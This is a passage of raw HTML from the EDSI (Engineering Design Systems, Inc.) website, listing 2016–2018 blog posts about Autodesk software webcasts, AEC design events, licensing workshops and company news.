class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/marketing-interns/">EDSI Marketing Interns 2018</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">EDSI Intern Program 2018 What do you get when you put a Hokie and a Wahoo in the same office for a summer as interns? It is no secret that t<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/marketing-interns/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="250" src="https://www.edsi.com/wp-content/uploads/2018/08/exec-370x250.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/aec-design-tech-event/" title="Permalink to AEC Design Tech Event" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">August 2, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/aec-design-tech-event/">AEC Design Tech Event</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">AEC DESIGN TECH SEMINAR AEC design event - Executive Briefing Breakfast Engineering Design Systems, Inc. (EDSI) is hosting its first event i<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/aec-design-tech-event/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/08/Untitled-design-370x280.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/software-licensing-workshop/" title="Permalink to Software and Licensing Workshop" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">May 9, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/software-licensing-workshop/">Software and Licensing Workshop</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">EDSI understands the challenges we are all facing keeping pace with current technology.  In response, we are hitting the road this spring fo<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/software-licensing-workshop/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/customer-briefing-roadshow/" title="Permalink to Customer Briefing Roadshow" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">May 4, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/customer-briefing-roadshow/">Customer Briefing Roadshow</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Do you need to simplify? If you’re like me, there’s always more to get done. From work responsibilities, to spending time with loved ones, t<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/customer-briefing-roadshow/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/08/Untitled-design-370x280.png" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/software-licensing-workshop-2/" title="Permalink to Software and Licensing Workshop" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">May 1, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/software-licensing-workshop-2/">Software and Licensing Workshop</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">EDSI understands the challenges we are all facing keeping pace with current technology.  In response, we are hitting the road this spring fo<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/software-licensing-workshop-2/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/industry-update-2018/" title="Permalink to Industry Update &#8211; March 2018" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">March 8, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/industry-update-2018/">Industry Update &#8211; March 2018</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">EDSI CEO and President, Kevin Meredith, addresses high-level industry topics as it pertains to Autodesk software and EDSI initiatives. Pleas<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/industry-update-2018/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2018/02/fr-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/formit-revit-workflow-walkthrough/" title="Permalink to FormIt to Revit Workflow Walkthrough" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">February 23, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/formit-revit-workflow-walkthrough/">FormIt to Revit Workflow Walkthrough</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">In EDSI's second webcast of 2018 Mariah and Douglas explored the workflow of importing a conceptual FormIt model into a Revit project enviro<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/formit-revit-workflow-walkthrough/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/formit-2-revit-workflow/" title="Permalink to FormIt to Revit Workflow" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">February 22, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/formit-2-revit-workflow/">FormIt to Revit Workflow</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">FormIt to Revit Workflow - EDSI's AEC Team, Mariah Roth and Douglas Braye, Sr. Thank you to all who attended the webinar yesterday, below is<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/formit-2-revit-workflow/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/getting-started-with-formit/" title="Permalink to Getting Started with FormIt" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">January 30, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/getting-started-with-formit/">Getting Started with FormIt</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">In EDSI's first webcast of 2018 Mariah &amp; Douglas introduced FormIt and some best practices to help you get started. The recording to the<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/getting-started-with-formit/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/edsi-aia-ohio-announcement/" title="Permalink to Engineering Design Systems, Inc. to serve as a BIM services resource for AIA Ohio" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">January 17, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/edsi-aia-ohio-announcement/">Engineering Design Systems, Inc. to serve as a BIM services resource for AIA Ohio</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Roanoke, VA: Engineering Design Systems, Inc. (EDSI), an Autodesk Gold Partner and BIM Services Provider, will be working with the American<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/edsi-aia-ohio-announcement/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/upcoming-events/" title="Permalink to Upcoming Events 2018" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">January 11, 2018</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/upcoming-events/">Upcoming Events 2018</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">In 2018, EDSI is making an even greater effort to bring you valuable web series and events. Plan ahead by registering for these upcoming eve<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/upcoming-events/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/pa-infrastructure-aec-collections-demo/" title="Permalink to Event Recap: AEC Collections &#8211; Infrastructure Demo, Pittsburgh" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">December 12, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/pa-infrastructure-aec-collections-demo/">Event Recap: AEC Collections &#8211; Infrastructure Demo, Pittsburgh</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">We had an outstanding time in Pittsburgh at the Autodesk offices on Thursday! Thank you to everyone who attended and we are looking forward<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/pa-infrastructure-aec-collections-demo/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/aec-collections-pa-infrastructure-seminar/" title="Permalink to Autodesk AEC Collection: The Best Tools for the Job &#8211; Infrastructure Demo Pittsburgh, PA" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">November 29, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/aec-collections-pa-infrastructure-seminar/">Autodesk AEC Collection: The Best Tools for the Job &#8211; Infrastructure Demo Pittsburgh, PA</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Our team at EDSI, as well as our partners at Autodesk, are excited to invite you to this upcoming event in Pittsburgh, PA at the Autodesk of<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/aec-collections-pa-infrastructure-seminar/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/c4r_webcast/" title="Permalink to C4R Webcast" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">November 8, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-film-1"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/c4r_webcast/">C4R Webcast</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">EDSI and Autodesk partnered to share this powerful collaboration and communication tool, Collaboration for Revit and BIM 360 Team. Caesar Ru<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/c4r_webcast/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/time-saving-support-with-ava-2/" title="Permalink to The Best Tools for the Job &#8211; AEC Collections Infrastructure Demo, WV" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">September 29, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/time-saving-support-with-ava-2/">The Best Tools for the Job &#8211; AEC Collections Infrastructure Demo, WV</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Thank you to those who attended our AEC Collection Infrastructure Demo in West Virginia! We hope you got a lot out of Jerry’s presentation a<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/time-saving-support-with-ava-2/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/time-saving-support-with-ava/" title="Permalink to Time Saving Support with AVA" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">September 7, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/time-saving-support-with-ava/">Time Saving Support with AVA</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Mike Motty and Ashley Wheeling introduce you to AVA and the assistance she can provide. You will learn functionality and see tips on how to<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/time-saving-support-with-ava/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/future_of_design_construction/" title="Permalink to Future of Design &#038; Construction: 3D Printing" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">August 23, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/future_of_design_construction/">Future of Design &#038; Construction: 3D Printing</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">3D printing is becoming more available and, as the technology transforms, opens the doors for application to other industries such as medici<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/future_of_design_construction/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/managing-users-autodesk_account/" title="Permalink to Managing Users in Autodesk Account" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">August 8, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/managing-users-autodesk_account/">Managing Users in Autodesk Account</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Ashley Wheeling, EDSI's Customer Success Manager, presents a number of key items in order to effectively manager users in Autodesk Account.<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/managing-users-autodesk_account/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/edsi-training/" title="Permalink to EDSI Training" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">August 4, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/edsi-training/">EDSI Training</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Caught some training happening this week @ EDSI’s corporate training classroom. Mike Neal led this class on AutoCAD Electrical to make sure<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/edsi-training/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/maintenance-to-subscription-webinar/" title="Permalink to Maintenance to Subscription Program" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">July 26, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/maintenance-to-subscription-webinar/">Maintenance to Subscription Program</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">&nbsp; Kevin Meredith, EDSI president, covers an overview of the Autodesk Maintenance to Subscription Program in this recording. He shares s<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/maintenance-to-subscription-webinar/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/autodesk-and-the-m2s-transition/" title="Permalink to Autodesk and the M2S Transition" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">July 14, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/autodesk-and-the-m2s-transition/">Autodesk and the M2S Transition</a></h2><span class="entry-meta">By edsihosting</span></td></tr></table></div><div class="entry-excerpt">Registration link for webcast below. Autodesk has introduced a customer loyalty program that requires exiting customers to choose one of two<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/autodesk-and-the-m2s-transition/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/managing-cloud-credits/" title="Permalink to Managing Cloud Credits" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">July 13, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-film-1"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/managing-cloud-credits/">Managing Cloud Credits</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Ashley Wheeling, our Customer Success Manager, covers Cloud Credits and how to track and manage the usage of these resources. For more infor<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/managing-cloud-credits/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/rebuilding-american-design-manufacturing-infrastructure/" title="Permalink to (Re)Building American Design, Manufacturing, &#038; Infrastructure" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">July 4, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/rebuilding-american-design-manufacturing-infrastructure/">(Re)Building American Design, Manufacturing, &#038; Infrastructure</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">American design lessons from our forefathers - “Striving for more equality, pushing boundaries, and creating constant mechanisms for improve<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/rebuilding-american-design-manufacturing-infrastructure/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/building-construction-future/" title="Permalink to Building Construction of the Future (&#038; Today!)" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">June 21, 2017</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/building-construction-future/">Building Construction of the Future (&#038; Today!)</a></h2><span class="entry-meta">By <a href="https://www.edsi.com" title="Visit Jacob Bruch&#8217;s website" rel="author external">Jacob Bruch</a></span></td></tr></table></div><div class="entry-excerpt">Building construction, and design technology is changing at an incredible rate! Companies taking advantage of construction industry changes<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/building-construction-future/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/added-customer-success-manager/" title="Permalink to Added: Customer Success Manager" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">September 14, 2016</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/added-customer-success-manager/">Added: Customer Success Manager</a></h2><span class="entry-meta">By edsihosting</span></td></tr></table></div><div class="entry-excerpt">We have recently added a new position at EDSI, and are thrilled to announce it is a position fully focused on our clients! Ashley Wheeling h<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/added-customer-success-manager/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" src="https://www.edsi.com/wp-content/uploads/2017/04/EDSI-Logo-Main-370x280.jpg" class="attachment-apex-featured-archive size-apex-featured-archive wp-post-image" alt="EDSI Logo" /><span class="entry-featured-overlay"><span class="entry-featured-icons-container"><span class="entry-featured-icons entry-featured-icons-1 clearfix"><a href="https://www.edsi.com/updated-edsi-logo/" title="Permalink to Updated EDSI Logo" rel="bookmark"><i class="apex-icon-zoom"></i></a></span></span></span><span class="entry-featured-data clearfix"><span class="entry-date">July 28, 2016</span><span class="entry-comments">0<span class="entry-comments-arrow"></span></span></span></div><table class="entry-post-data"><tr><td class="entry-icon"><i class="apex-icon-file"></i></td><td><h2 class="entry-title"><a href="https://www.edsi.com/updated-edsi-logo/">Updated EDSI Logo</a></h2><span class="entry-meta">By edsihosting</span></td></tr></table></div><div class="entry-excerpt">At EDSI we’ve always put people first. Along with the big industry changes, we have made many changes as a company over the past 30 years. T<span class="mtphr-post-slider-excerpt-more">&hellip;<br/><a class="apex-readmore" href="https://www.edsi.com/updated-edsi-logo/">Learn more</a></span></div> </div> <div class="mtphr-post-slider-block mtphr-post-post-slider-block "> <div class="entry-header"><div class="entry-featured-archive"><img width="370" height="280" 